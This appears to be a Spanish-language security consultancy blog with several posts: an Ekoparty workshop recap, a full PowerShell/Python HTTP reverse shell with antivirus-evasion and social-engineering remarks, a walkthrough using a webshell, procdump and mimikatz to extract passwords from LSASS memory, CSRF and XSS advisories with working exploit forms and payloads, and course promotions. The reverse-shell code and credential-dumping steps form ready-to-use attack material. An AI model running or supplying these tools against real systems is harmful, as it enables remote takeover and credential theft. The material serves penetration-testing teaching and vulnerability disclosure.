lunes, 16 de noviembre de 2015

Workshops @ Ekoparty 2015

Del 21 al 23 octubre se llevó a cabo la conferencia de seguridad Ekoparty (#eko11), en esta ocasión tuvimos el agrado de ser representados por Walter Cuestas, Mauricio Urizar y Juan Oliva, quienes, tuvieron el gusto de realizar los workshops "PowerShell para pentesters", "Nmap Web Hacking 101" y  "Pentesting de Canales Transaccionales de Banca y Retail"

Ekoparty es, sin duda, no solo una conferencia que reúne a reconocidos profesionales de diversas partes del mundo, sino, literalmente, una fiesta donde los asistentes pueden compartir conocimiento, experiencias, amistades, vivencias, juegos y hasta unas cervezas.

Por este medio queremos felicitar a los organizadores y a nuestros consultores por esta fiesta de la seguridad y queremos compartir con ustedes unas imágenes de lo que fue la Ekoparty (#eko11).

A continuación podrán ver la galería con algunas fotos del evento:

Ekoparty


También compartimos las diapositivas de los workshops:

Los scripts presentados en la conferencia pueden descargarlos desde: https://github.com/Open-Sec/ekoparty2015

Saludos.

viernes, 16 de octubre de 2015

Shell Reversa sobre HTTP con PowerShell

En unos días mas se inicia la edición 11 de Ekoparty, una conferencia muy reconocida, a la que tuvimos el gusto de asistir hace algún tiempo, en la República Argentina, país hermano que nos ha dado tantos buenos recuerdos.

Como dicen, para muestra un botón, así que les presentamos algo básico de lo que podrán ver en el workshop de “PowerShell para Pentesters” que desarrollarán Walter Cuestas y Mauricio Urizar, dos miembros de Open-Sec, con amplia experiencia en diversas áreas de la seguridad informática.

El día de hoy les presentamos una Shell Reversa que se comunica con su “maestro” a través de HTTP y esta implementada en PowerShell. Durante los ataques del lado del cliente, se puede emplear una combinación de técnicas o emplear ingeniería social con la finalidad de lograr que el usuario ejecute el script malicioso.

El uso de ingeniería social para lograr que la “víctima” ejecute nuestro script es nada descabellado, varios desarrolladores hacen uso de código que encuentran en la web y muchas veces ni lo revisan, incluso los pentesters reconocidos no se encuentran libres de este tipo de descuidos, recuerdo una vez que un buen amigo (que mantendremos en el anonimato por obvias razones) buscó un exploit para una vulnerabilidad y para su sorpresa encontró uno hecho que prometía hacer el trabajo gratis, luego de ejecutarlo y no ver la shell prometida, se dió con la amarga sorpresa de que el “exploit” había borrado los archivos de su “directorio home”, entre otras lineas de código había una con el siguiente comando: “rm -rf ~”.

¿Qué es PowerShell?

Según Microsoft (https://technet.microsoft.com/es-es/library/bb978526.aspx): Windows PowerShell® es un lenguaje de scripting y shell de línea de comandos basado en tareas diseñado especialmente para la administración del sistema. Creado con Microsoft .NET Framework, Windows PowerShell ayuda a los profesionales de TI y a los usuarios experimentados a controlar y automatizar la administración tanto del sistema operativo Windows como de las aplicaciones que se ejecutan en Windows.
Los comandos de Windows PowerShell, denominados cmdlets, permiten administrar los equipos de la empresa desde la línea de comandos. Los proveedores de Windows PowerShell permiten obtener acceso a almacenes de datos (como el Registro y el almacén de certificados) con la misma simplicidad con que se obtiene acceso al sistema de archivos. Además, Windows PowerShell tiene un analizador de expresiones muy completo y un lenguaje de scripting totalmente desarrollado.

Según la perspectiva de un pentester:

PowerShell es una poderosa herramienta de scripting que permite ejecutar casi cualquier tarea de pentesting desde MS Windows, claro no es lo mismo tener un nmap instalado en nuestra víctima, pero si no lo esta con PowerShell podemos fácilmente ejecutar un escaneo de puertos o cualquier otra cosa que nos imaginemos.

¿Por qué usar PowerShell?

Muchas veces hemos logrado acceso a servidores donde solo han instalado el software indispensable, y queremos intentar comprometer otro servidor, ante la falta de herramientas instaladas, podemos hacer uso de diversas técnicas, entre ellas el uso de PowerShell.
Con PowerShell es relativamente sencillo evadir cualquier antivirus, además es tan potente como lo sea tu imaginación, así que no hay limites para los scripts que desees desarrollar.
Entre mas familiarizado estés con Microsoft .Net Framework mas sencillo te será desarrollar scripts para atacar.



Como vemos en la imagen, la “víctima” se comunica con el “atacante” pasando a través de los servidores firewall, proxy, anti-malware, para esto emplea el protocolo HTTP, donde el “atacante” envía un comando que será ejecutado en la víctima y finalmente la víctima retorna el resultado del comando. La ventaja de usar PowerShell es que existen muchísimas formas de hacer ataques, y muchísimas formas de evadir las firmas de los anti-malware, además es posible enviar los comandos cifrados, emplear HTTPS, emplear el proxy de la empresa, etc, con la finalidad de evitar los filtros anti-malware.

El paso de variables entre víctima y atacante lo realizaremos a través de cabeceras HTTP, codificadas en base64. El componente “maestro” perteneciente al atacante esta desarrollado en Python, envía el comando a través de la cabecera CMD y recibe la respuesta a través de la cabecera RPTA.

El código del “maestro” es el siguiente:
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
import base64
PORT= 80
class clsMaster(BaseHTTPRequestHandler):

   def do_GET(self):
     self.send_response(200)
     if (self.headers.get('RPTA')):
       rpta=self.headers.get('RPTA')
       print base64.b64decode(rpta)

     else:

       cmd = base64.b64encode(raw_input("command:>> "))
       self.send_header('CMD',cmd)
       self.end_headers()
     self.wfile.write("<html><body><h1>It
works!</h1><p>This is the default web page for this
server.</p><p>The web server software is running but no
content has been added, yet.</p></body></html>")
     return
try:
   server = HTTPServer(('',PORT), clsMaster)
   server.serve_forever()
except KeyboardInterrupt:
    server.socket.close()



El script que deberá ser ejecutado en la “víctima” se conecta al “atacante”, recibe los comandos a ser ejecutados y envía las respuestas, todo esto a través de cabeceras HTTP codificadas en base64:
while (1)
{
<#direccion URL del atacante#>
$server = "http://192.168.0.32/";
$req = [System.Net.HttpWebRequest]::Create($server);
<#
#############################################################
#                   Proxy Configuration                     #
#############################################################
#$proxy=[System.Net.WebRequest]::GetSystemWebProxy();
#$proxy.Credentials=[System.Net.CredentialCache]::DefaultCredentials;
#$req.proxy = $proxy
#############################################################
#>
$res = $req.GetResponse();
$cmdcoded = $res.GetResponseHeader("CMD");


<#decodifica el comando cmd enviado en base64#>
$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cmdcoded));


<#crea y ejecuta un proceso cmd.exe con los comandos enviados por el atacante#>
$psi= New-Object System.Diagnostics.ProcessStartInfo;
$psi.FileName = "cmd.exe";
$psi.RedirectStandardOutput = $true;
$psi.RedirectStandardInput = $true;
$psi.RedirectStandardError = $true;
$psi.UseShellExecute = $false;
$process = New-Object System.Diagnostics.Process;
$process.StartInfo = $psi;
$process.Start();
$process.StandardInput.WriteLine($cmd);
$process.StandardInput.WriteLine("exit");
$standardOut = $process.StandardOutput.ReadToEnd();
$process.WaitForExit();


<#codifica la respuesta en base64#>
$rpta=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($standardOut));
$res.Close();
<#inicia otra petición para enviar la respuesta al atacante#>
$req2 = [System.Net.HttpWebRequest]::Create($server);
$req2.Headers.add('RPTA',$rpta);
$res2 = $req2.GetResponse();
$res2.Close();

Cuando ejecutamos ambas partes podemos ver en la ventana de comandos del atacante lo siguiente:



Y en la ventana de la víctima lo siguiente:

 Si desean conocer mas al detalle como emplear PowerShell para labores de pentest, vayan a Ekoparty y asistan al Workshop “PowerShell para Pentesters”, y si no pueden viajar pueden hacer sus peticiones para que lo repitan en PeruHack 2015.


Información del Workshop “PowerShell para Pentesters”

Descripción : El uso de PowerShell para la labor de un pentester va mas alla de la post-explotación hoy en día. Este workshop muestra como realizar labores de pentesting básicas desde cero (escaneo de puertos y servicios, carga y descarga de archivos, bypass de restricciones de ejecución) hasta su aplicación en ataques del lado cliente, post-explotación y el uso de scripts avanzados que forman parte del arsenal de un pentester.

BIOS :

Walter Cuestas Agramonte
Actual Gerente General de Open-Sec, empresa peruana dedicada a desarrollar servicios de ethical hacking y análisis de incidentes de seguridad informática. Dirige el equipo de hackers profesionales de Open-Sec desde el 2006.
Su labor se basa en desarrollar técnicas de intrusión y su interés principal está en el desarrollo de scripts para pentesting. Es instructor del curso de Ethical Hacking (PCC Seguridad Informática) en TECSUP e Instructor Autorizado por Mile2 en el nivel Senior.
Cuenta con las certificaciones OSCP, C)PTC, C)PTE y C|EH.
Ha participado como expositor en eventos como LimaHack, Campus Party Quito, CSI Pereira y eventos de OWASP Latam.
También, ha publicado artículos en revistas especializadas como Hakin9, PenTest Magazine y Hack-in-Sight.


Mauricio Urizar Franco
Mauricio Urizar es investigador en Seguridad y Consultor en Open-Sec. Sus principales intereses en el campo son las técnicas de explotación de vulnerabilidades, la ingeniería social, la investigación en vulnerabilidades en aplicaciones de pago así como cajeros Automaticos(ATM), cajeros (ventanilla)/cores bancarios,puntos de venta (PoS), switches transaccionales. Focalizado en Seguridad de tipo ofensiva, Mauricio ha descubierto públicamente vulnerabilidades críticas en este tipo de infraestructuras. Trabaja hace 8 años exclusivamente como proveedor de servicios de seguridad ofensiva (pentester) para empresas de distintos rubros como energía, financieras, medios, ventas, gobierno, servicios y organizaciones de desarrollo de software.

lunes, 20 de enero de 2014

EXTRAYENDO CONTRASEÑAS DE LA RAM CON MIMIKATZ 2.0 (ALFA)

Luego de “Sacando credenciales hasta del bolsillo” en @peruhackcon2013 he recibido algunas consultas sobre como utilizar mimikatz 2.0 (ALFA), esta herramienta puede ser particularmente útil durante la etapa de explotación de vulnerabilidades en un servicio de pentest, por ejemplo la explotación de una aplicación web vulnerable a carga de archivos (File Upload) sin restricciones en muchos ataques es el primer paso para tomar control del sistema objetivo.

A continuación, el ataque sólo tiene que encontrar la manera de ejecutar código luego de subir la respectiva webshell "phpshel.php" vemos que nos encontramos con permisos de "NT AUTHORITY\SYSTEM" y queremos extraer la clave del "Administrator", lo primero que pensamos es "la hago con meterpreter" y cuando logramos subirlo el antivirus del servidor web afectado reconoce dicha herramienta como código "malicioso"...

Para este caso podríamos utilizar la técnica que nos presenta mimikatz 2.0 (ALFA) puesto que en esta nueva versión ya no es necesario “inyectar” la librería "sekurlsa.dll" en el proceso de LSASS mimikatz# inject::process lsass.exe sekurlsa.dll, en esta nueva versión la técnica se basa en la obtención de contraseñas en texto plano volcando el proceso LSASS.EXE desde la memoria RAM, sin necesidad de ejecutar código "malicioso" en el servidor, de esta forma se evita tener que lidiar con técnicas de evasión antivirus y otros dolores de cabeza.

En este post me gustaría mostrar paso a paso como podemos usar la funcionalidad de mimikatz 2.0 (ALFA) explotando una aplicación web vulnerable a carga de archivos sobre un servidor Windows 2008.

1.SUBIENDO LAS HERRAMIENTAS
Subir las herramientas usando una aplicación vulnerable a carga de archivos (File Upload).
En caso de tener problemas para hallar la ruta en donde se han almacenado los archivos cargados en el servidor, podríamos usar Dirbuster para tratar de descubrir el directorio en donde se encuentren nuestros archivos en este caso se hallaron en "/webapp/admin/panel/images/"

phpshell.php; para realizar la ejecución de comandos en el servidor web afectado.
procdump.exe; nos permitirá realizar el volcar el espacio de memoria RAM del proceso LSASS.EXE a un archivo.dmp (dump)

Subiendo "WebShell" al servidor

Subiendo "procdump" al servidor


2.VOLCANDO LA RAM DEL SERVIDOR WEB

Ejecución del comando "dir" en el servidor para confirmar se logro subir la herramienta procdump.exe y el script desde donde se ejecutara (script.dumper.bat)

Usaremos Procdump para volcar el espacio de la memoria RAM asignado al proceso LSASS.EXE y generar archivo “dump” que se usará fuera de linea para conseguir la contraseña del "Administrador local" y/o del "Domain Admin".

Ejecución comando "dir" mediante phpshell.php?cmd=dir

Como utilizo procdump.exe?

Se ejecutara desde el archivo script.dumper.bat donde llamaremos a procdump.exe y le pasaremos los siguientes parámetros:

-accepteula : opción de línea de comando para aceptar automáticamente el contrato de licencia de Sysinternals.
-ma : escribir un archivo de volcado con toda la memoria del proceso. El formato de volcado predeterminado sólo incluye hilos (threads) del proceso e información de gestión.

Por último la ubicación donde se guardara el archivo con el volcado del proceso lsass.exe (C:\xampp\htdocs\webapp\admin\panel\images\) una ubicación donde se pueda descargar vía el servidor web.

Procdump : http://technet.microsoft.com/sysinternals/dd996900.aspx

type script.dumper.bat
C:\xampp\htdocs\webapp\admin\panel\images\procdump.exe 
-accepteula
-ma lsass.exe
C:\xampp\htdocs\webapp\admin\panel\images\%COMPUTERNAME%_lsass.dmp
Contenido del script "script.dumper.bat"

Como ejecutar script.dumper.bat en el servidor web?

Ejecución script.bat mediante phpshell.php?cmd=script.dumper.bat

Descargar el archivo “dump” para explotarlo con #mimikat

Descarga del volcado de la RAM desde el directorio web


3.USANDO MIMIKATZ 2.0 - Modulo MINIDUMP!!

Descargar mimikatz desde el repositorio oficial gentilkiwi, descomprimir e ingresar desde la consola de comandos ejecutando mimikatz.exe.

mimikatz # privilege::debug
mimikatz # sekurlsa::minidump nombre-del-archivo-dump-descargado.dmp
mimikatz # sekurlsa::logonpasswords


Listado de Archivos.

Enumeración de hashes y claves en texto plano del usuario Administrador


Herramientas utilizadas:
Mimikatz: http://blog.gentilkiwi.com/securite/mimikatz/minidump
Procdump: http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

No aplicar este material ni conocimientos sin el consentimiento explícito que autorice a hacerlo.(leer descargo de responsabilidades)




sábado, 11 de mayo de 2013

OSEH @ 2013 : Una nueva oportunidad !

A menudo escriben a consultarnos sobre la apertura del Open Sec Ethical Hacker (OSEH) debido a que ya son conocidas las expectativas que este curso genera, por lo tanto, les comunicamos que la fecha esta fijada para los días 21, 22 y 23 de Junio. Este curso solo se dicta al público en general 1 vez al año, así que, no pierdan esta gran oportunidad.

Es común, en estos días, recibir una serie de correos enviando información sobre cursos y seminarios de los cuales no se tiene mucha información, todos prometen el oro y el moro.  Es ahí donde tomas la decisión de asistir, finalmente, llevándote una gran decepción (en la mayoría de los casos), donde perdiste tiempo, dinero y sobre todo las cosas que antes conocías poco o tal vez nada,  ahora no han quedado claras o, peor aún, te llevas una idea errónea de las cosas.

Que nos diferencia de los demás? Somos PROFESIONALES que formamos un equipo de consultores llamado OPEN SEC quienes día a día comprobamos y explotamos en clientes diversas vulnerabilidades de diversos fabricantes. Nosotros compartimos nuestras experiencias en el curso (OSEH) de una manera 100% práctica, donde al finalizar el curso conocerás los errores más comunes que se pueden cometer, así como evaluar tu propia aplicación web, tu propia infraestructura y así buscar soluciones para estar a buen recaudo.


Finalmente, Oscar Martinez, Magister en Ciencias de la Computación, una de las personas con más amplios conocimientos a nivel nacional en seguridad informática, Ethical Hacking y Pentesting, así como certificados que avalan sus conocimientos, ha publicado en su blog una comparativa interesante sobre los cursos de Ethical Hacking y pentesting.  Sí te queda alguna duda sobre qué curso debes elegir, te recomendamos despejes esas dudas aquí.

viernes, 11 de enero de 2013

Advisory CSRF-ClearOS 10012013


Advisory ID: OS002

Product: ClearOS
Created by: Clear Foundation (http://www.clearfoundation.com/Foundation/core-team-honor-roll.html)
Vulnerable Version(s): 6.X.X
Tested Version: 6.1.0 - 6.3.0

Vulnerability Type: Cross-Site Request Forgery (CSRF) [CWE-352]
Public Disclosure : No yet
Vendor status : Notified
Vendor Answer : "We expect these to be resolved for the ClearOS 6.4.0 Beta 2 (due later this month)."

CVSS Base Score: 5.8
CVSS Temporal Score: 4.8
CVSS Environmental Score: 4.8

Researcher: Camilo Galdos, Security Consultant @ Open-sec ( http://www.open-sec.com/ )

Advisory Details :

Camilo Galdos, Security Consultant at Open-Sec discovered a vulnerability in ClearOS, which can be exploited to remotely add accounts to the ClearOS system by making the Administrator access a link.

Vulnerability Description: Cross-Site Request Forgery (CSRF) in ClearOS:

90% of the forms in ClearOS and Modules do not use a Token to correctly verify if the form is being send by the administrator or user in ClearOS.
Examples of URLs that lead to exploit this vulnerability are:

https://127.0.0.1:81/app/users/edit/get

POST:

user_info%5Bcore%5D%5Busername%5D=get&user_info%5Bcore%5D%5Bfirst_name%5D=Get&user_info%5Bcore%5D%5Blast_name%5D=ClearOS&password=clear&verify=clear&user_info%5Bplugins%5D%5Bftp%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bopenvpn%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bpptpd%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bprint_server%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bsmtp%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Buser_certificates%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bweb_proxy%5D%5Bstate%5D=0&user_info%5Bextensions%5D%5Bshell%5D%5Blogin_shell%5D=%2Fsbin%2Fnologin&submit=Update


https://127.0.0.1:81/app/users/add

POST:
user_info%5Bcore%5D%5Busername%5D=usernametest&user_info%5Bcore%5D%5Bfirst_name%5D=firstnametest&user_info%5Bcore%5D%5Blast_name%5D=lastnametest&password=l0l123&verify=l0l123&user_info%5Bplugins%5D%5Bweb_proxy%5D%5Bstate%5D=1&submit=Add

Exploit:

<html>
<title>CSRF ClearOS</title>
<h1>CSRF ClearOS ~ Open-Sec</h1>

<form name="lol" id="lol" class="theme-form" action="https://192.168.1.40:81/app/users/add" method="post" accept-charset="utf-8" autocomplete="off">
<input type="hidden" name="user_info[core][username]" value="Dedalo"/>
<input type="hidden" name="user_info[core][first_name]" value="Camilo"/>
<input type="hidden" name="user_info[core][last_name]" value="Galdos"/>
<input type="hidden" name="password" value="p455w0rd"/>
<input type="hidden" name="verify" value="p455w0rd"/>
<input type="submit" name="submit" value="Add"/>
</form>
</html>


Impact: Administrators can be scammed to visit a link and when they visit it they automaticaly create a new user or edit a user or change a password or anything that is in a form because almost no form has a token to validate.

Solution:

To fix this kind of vulnerability (CSRF) you must put an authentication token in every form to validate that the form is being sent from an specified module or page. Owasp have different examples in different Programming Languages so you can take one in example to patch this vulnerability.

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet


Contact Information: For additional details, feel free to contact Camilo Galdos at cgaldos[at]open-sec.com


About Open-Sec:

Open-Sec is a Perú based company focused on penetration testing and security incidents investigation services. With customers at Perú, Ecuador, Panamá and Honduras, Open-Sec provides consulting services through a team of certified and experienced consultants.

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 

lunes, 29 de octubre de 2012

Advisory XSS-ASPMyAdmin 10102012


Advisory ID: OS001

Product: ASPmyAdmin
Created by: Sukalyan Chakraborty
Vulnerable Version(s): NA
Tested Version: NA

Vulnerability Type: Reflected Cross-Site Scripting [CWE-712]
Public Disclosure: October 10, 2012
Vendor status : Notified
CVSS Base Score :5.8
CVSS Temporal Score 5.8
CVSS Environmental Score 7.5
Researcher: Alfredo García, Senior Security Consultant @ Open-sec ( http://www.open-sec.com/ )

Advisory Details :

Alfredo García, Senior Security Consultant at Open-Sec discovered a vulnerability in ASPmyAdmin, which can be exploited to perform Multiple Cross-Site Scripting (XSS) and arbitrary HTML injection attacks.

Vulnerability Description : Multiple Cross-Site Scripting (XSS) in ASPmyAdmin:

ASPMyAdmin includes ASP scripts that fail to adequately sanitize output strings coming from user-supplied input . By leveraging this issue, an attacker may be able inject arbitrary HTML and Javascript code to be executed in a user's browser within the security context of the affected victim.
At least, the following scripts are vulnerable using the dbName parameter through GET :
db_info.asp
db_table.asp
db_view.asp
db_procedure.asp
db_sql.asp
db_drop.asp

Examples of URLs that lead to exploit this vulnerability are :

http://www.host.com/db_table.asp?dbName=<script>alert(document.cookie)</script>
http://www.host.com/db_procedure.asp?dbName=<script>window.alert('Open-Sec')</script>
Impact : Victims are exposed to unwanted content, modified content, redirection to other site and/or content, user's session cookies stealing, browser-based attacks, etc.

Solution:

To fix this kind of vulnerability (XSS), you colud establish a web application firewall, but, actually, you must validate all output strings. You must validate that the output is the type, length and format are the expected ones. For more information on prevention, visit :https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet

Also, check out the following link to implement web application security based on ESAPI
https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API

Contact Information : For additional details, feel free to contact Alfredo Garcia at agarcia@open-sec.com


About Open-Sec : 

Open-Sec is a Perú based company focused on penetration testing and security incidents investigation services. With customers at Perú, Ecuador, Panamá and Honduras, Open-Sec provides consulting services through a team of certified and experienced consultants.

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 

martes, 9 de octubre de 2012

Webminar : Implantación y certificación de la norma PCI DSS




Open-Sec , en alianza con  Internet Security Auditors tiene el agrado de invitarlos al webminar "Implantación y certificación de la norma PCI DSS"

Instituciones y organizaciones que almacenen, procesen y/o transmitan información de titulares de tarjetas, debe cumplir la norma PCI DSS, para evitar fraudes o robos de información confidencial. El webminar tiene como objetivo brindar el marco general de la norma, el proceso de implementación y su posterior certificación.

A continuación los detalles de la charla:

Horario
23 de octubre de 2012, 10:00 a.m. Lima (17:00 CET) - 11:30 a.m. Lima (18:30 CET)

Temario

10:00 Bienvenida al webinar
  10:05 Introducción a PCI DSS
              i) ¿Qué es PCI DSS?
              ii) Otras Normas PCI: PA-DSS, P2PE, PTS
              iii) Aplicabilidad
              iv) Programas de Cumplimiento de las Marcas
  10:25 Implantación PCI DSS (40 minutos)
             i) Proceso de Implantación
             ii) Ámbito de Cumplimiento (Scope)
             iii) Técnicas de reducción del Ámbito
                 a. Eliminación
                 b. Segmentación
                 c. Tokenización
                 d. P2PE
  11:00 Certificación PCI DSS
              i) Proceso de auditoría
              ii) Mantenimiento de la certificación
  11:15 Turno de preguntas
  11:30 Fin del webinar

Ponente
Miguel Ángel Domínguez

Biografía:
Miguel Ángel Domínguez es socio y co-fundador de Internet Security Auditors, y dirige el departamento de Consultoría que lidera los proyectos de implantación de la norma PCI DSS. Ha desarrollado su carrera profesional en el ámbito de la auditoría y la consultoría de seguridad de sistemas de información, colaborando en la metodología OSSTMM que se ha convertido en estándar de auditoría para pentesting. Está certificado PCI QSA, PA QSA, CISA, CISSP, ISO27001 Lead Auditor Instructor, CGEIT, SBCI y OPST. Es Licenciado en Ingeniería Informática por la Universidad Autónoma de Barcelona y Máster en Seguridad TI y Comercio Electrónico por La Salle.

Para registrarse al evento , escribir a : info@open-sec.com